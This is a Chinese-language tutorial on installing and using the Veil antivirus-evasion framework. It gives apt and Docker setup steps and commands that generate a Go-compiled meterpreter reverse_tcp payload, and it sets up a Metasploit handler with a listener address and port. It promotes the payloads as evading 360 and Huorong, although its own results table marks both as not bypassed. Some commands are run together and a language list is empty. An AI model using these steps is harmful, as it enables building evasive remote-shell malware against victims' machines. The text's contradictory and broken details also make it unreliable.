本文共 1949 字,大约阅读时间需要 6 分钟。
本文将详细介绍Veil免杀框架的安装与使用方法,以及其在绕过常见杀毒软件检测中的应用。
以下表格展示了常见杀毒软件对Payload检测情况的测试结果,√ 表示该杀毒软件未检测到病毒(Bypass)。
| 关键词 | 360(静态+动态) | 火绒(静态+动态) | Other Antivirus(在线查杀,仅供参考) |
|---|---|---|---|
| 表现形式 | ❌(均未Bypass) | ❌(均未Bypass) | ❓(数据仅供参考) |
Veil、Venom 和 Shellter 是三大知名的免杀工具。尽管免杀工具的出名使得其防御价值降低,但它仍然是红队和安全研究者不可或缺的工具。Veil-Evasion 是一款基于 Python 的免杀框架,能够将任意脚本或 shellcode 转换为 Windows 可执行文件,并可结合 Metasploit 生成兼容的 Payload,从而逃避常见杀毒软件的检测。
Veil 可从 GitHub 获取:veil 框架地址
安装指南可参考 FreeBuf 文章。apt -y install veil veil/usr/share/veil/config/setup.sh --force --silent
推荐使用 Docker镜像来简化安装:
apt-get install docker docker-compose
systemctl start docker
{ "registry-mirrors": ["https://1nj0zren.mirror.aliyuncs.com", "https://docker.mirrors.ustc.edu.cn", "http://f1361db2.m.daocloud.io", "https://registry.docker-cn.com"]} systemctl daemon-reload systemctl restart docker
docker pull mattiasohlsson/veil
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
Veil 提供两种核心工具:Evasion(文件免杀)和 Ordnance(生成 shellcode)。以下从 Evasion 开始。
Veil>: use 1
Veil/Evasion>: list
该命令显示 41 种不同的 stager,支持多种编码方式,推荐使用 Go语言或 Ruby 编码。
veil generate --payload windows/meterpreter/reverse_tcp --language go --output payload Go
use multi/handler set lhost 192.169.128.142 set lport 5555 generate
Ordnance 用于生成能够绕过杀软检测的 shellcode。使用方法类似:
Ordnance>: use 7
然后设置目标参数(如 lhost 和 lport),生成 shellcode 并保存至 /tmp/veil-output/source/ 目录。
Veil 支持多种编译语言,包括:
Veil 几乎能够实现完全免杀,生成的 Payload 能够绕过 360、火绒等常见杀毒软件的检测。其唯一不足之处是生成的 exe 文件较大(尤其是 Go 和 Python 生成的),但这种体积对于现代防火墙和 AV 无构成威胁。Veil 的 shellcode 生成能力和与 Metasploit 的无缝对接使其成为红队工具的不二选择。